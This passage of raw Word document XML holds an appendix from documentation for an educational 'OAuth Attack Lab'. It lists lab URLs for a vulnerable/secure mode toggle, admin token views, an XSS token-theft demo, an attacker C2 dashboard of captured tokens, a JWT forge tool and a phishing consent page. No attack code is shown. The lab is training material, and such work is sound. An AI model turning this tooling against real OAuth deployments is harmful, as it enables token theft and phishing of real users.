          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="360" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D1117"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Appendix — All Admin &amp; Debug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URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="55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F6FEB"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Shows</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bCs/>
                <w:color w:val="0D1117"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">YOUR_DOMAIN:3002</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Lab home page — mode toggle, all links, attack index</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YOUR_DOMAIN:3002/login</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Start OAuth flow (PKCE or non-PKCE depending on mode)</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YOUR_DOMAIN:3002/xss-demo</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Attack 3: XSS token theft simulation</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YOUR_DOMAIN:3002/docs</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Interactive docs portal with all 7 attack guides</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YOUR_DOMAIN:3001/admin/audit-log</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All security events logged by the auth server</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YOUR_DOMAIN:3001/admin/tokens</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All issued access tokens</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YOUR_DOMAIN:3001/admin/refresh-tokens</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Refresh token rotation state (rotated, revoked counts)</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YOUR_DOMAIN:3001/admin/clients</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Registered OAuth clients and their scopes</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YOUR_DOMAIN:3001/admin/mode</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Current mode (VULNERABLE or SECURE)</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YOUR_DOMAIN:3003/health</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Resource server health</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YOUR_DOMAIN:3004/dashboard</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Attacker C2: all captured codes and tokens</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YOUR_DOMAIN:3004/forge-jwt</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JWT forge tool for Attack 7</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YOUR_DOMAIN:3004/phishing</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Phishing consent page for Attack 4</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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YOUR_DOMAIN:3005</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0D1117"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Real-time security event monitoring dashboard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A043" w:sz="8"/>
              <w:left w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:bottom w:val="single" w:color="D1D5DB" w:sz="1"/>
              <w:right w:val="single" w:color="D1D5DB" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="F0FFF4" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="120"/>
              <w:left w:type="dxa" w:w="180"/>
              <w:bottom w:type="dxa" w:w="120"/>
              <w:right w:type="dxa" w:w="180"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="60"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="2EA043"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">🔄 Live Mode Toggle</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:color w:val="374151"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">You no longer need to restart Docker to switch modes. Visit YOUR_DOMAIN:3002 and click the "Switch Mode" button. The auth server switches instantly. The home page refreshes automatically to reflect the new mode.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OAuth Attack Lab  ·  Built by SinhaAmrit  ·  Educational Use Only  ·  </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
        <w:color w:val="1F6FEB"/>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t xml:space="preserve">github.com/SinhaAmrit/oauth-security-lab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117"/>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2026-03-05T02:26:21.272Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-03-05T02:26:21.273Z</dcterms:modified>
</cp:coreProperties>
</file>

<file path=docProps/custom.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/custom-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes"/>
</file>